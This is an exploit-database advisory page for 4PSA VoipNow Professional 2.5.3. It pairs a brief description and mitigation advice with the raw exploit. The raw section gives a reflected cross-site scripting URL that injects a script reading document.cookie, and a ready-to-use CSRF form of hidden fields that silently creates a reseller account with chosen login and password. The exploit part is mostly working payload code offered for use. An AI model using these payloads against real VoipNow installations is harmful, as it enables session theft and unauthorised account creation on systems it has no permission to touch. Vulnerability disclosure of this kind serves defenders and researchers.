4PSA VoipNow Professional 2.5.3 Reflected XSS / CSRF (Add Reseller) Vulnerabilities

vendor:

VoipNow Professional

by:

Aboud-el

5.5

CVSS

MEDIUM

Reflected XSS, CSRF

79, 352

CWE

Product Name: VoipNow Professional

Affected Version From: 2.5.2003

Affected Version To: 2.5.2003

Patch Exists: NO

Related CWE:

CPE: a:4psa:voipnow_professional:2.5.3

Metasploit:

Other Scripts:

Platforms Tested:

4PSA VoipNow Professional 2.5.3 Reflected XSS / CSRF (Add Reseller) Vulnerabilities

The vulnerabilities allow an attacker to perform a reflected cross-site scripting (XSS) attack and a cross-site request forgery (CSRF) attack. The XSS vulnerability can be exploited by injecting malicious code through the 'nsextt' parameter in the 'index.php' page. The CSRF vulnerability can be exploited by submitting a crafted form to the 'content.php?screen=resellers/edit_reseller' endpoint. Both vulnerabilities allow the attacker to execute arbitrary code or perform unauthorized actions on behalf of the victim.

Mitigation:

To mitigate the XSS vulnerability, input validation and output encoding should be implemented to prevent the injection of malicious code. To mitigate the CSRF vulnerability, proper CSRF protection measures such as CSRF tokens should be implemented.

Source

Exploit-DB raw data:

4PSA VoipNow Professional 2.5.3 Reflected XSS / CSRF (Add Reseller) Vulnerabilities
==================================================================================

##################################################################################
.:. Author         :  Aboud-el [aboud_el@hotmail.com]
.:. Script         : http://www.4psa.com/
.:. Gr34T$ T0 [AtT4CKxT3rR0r1ST]
##################################################################################

===[ Exploit ]===

Reflected XSS
=============

http://SITE/index.php?nsextt='"<script>alert(document.cookie)</script>


CSRF (Add Reseller)
===================

<form method="POST" name="form0" action="http://SITE/content.php?screen=resellers/edit_reseller">
<input type="hidden" name="edit_reseller_cmd" value="1"/>
<input type="hidden" name="client_template_id" value="2"/>
<input type="hidden" name="company" value="....."/>
<input type="hidden" name="name" value="....."/>
<input type="hidden" name="login" value="....."/>
<input type="hidden" name="password" value="....."/>
<input type="hidden" name="cpassword" value="....."/>
<input type="hidden" name="phone" value="....."/>
<input type="hidden" name="fax" value="....."/>
<input type="hidden" name="email" value="....."/>
<input type="hidden" name="address" value="....."/>
<input type="hidden" name="city" value="....."/>
<input type="hidden" name="pcode" value="00961"/>
<input type="hidden" name="country_id" value="122"/>
<input type="hidden" name="region_id" value="2073"/>
<input type="hidden" name="timezone_id" value="197"/>
<input type="hidden" name="language" value="en"/>
<input type="hidden" name="notes" value="....."/>
<input type="hidden" name="billing_plan_id" value="274"/>
<input type="hidden" name="charging_identifier" value="....."/>
</form>
<form method="GET" name="form1" action="http://SITE/content.php?screen=resellers/resellers&">
<input type="hidden" name="name" value="value"/> 
</form>

</body>
</html>

##################################################################################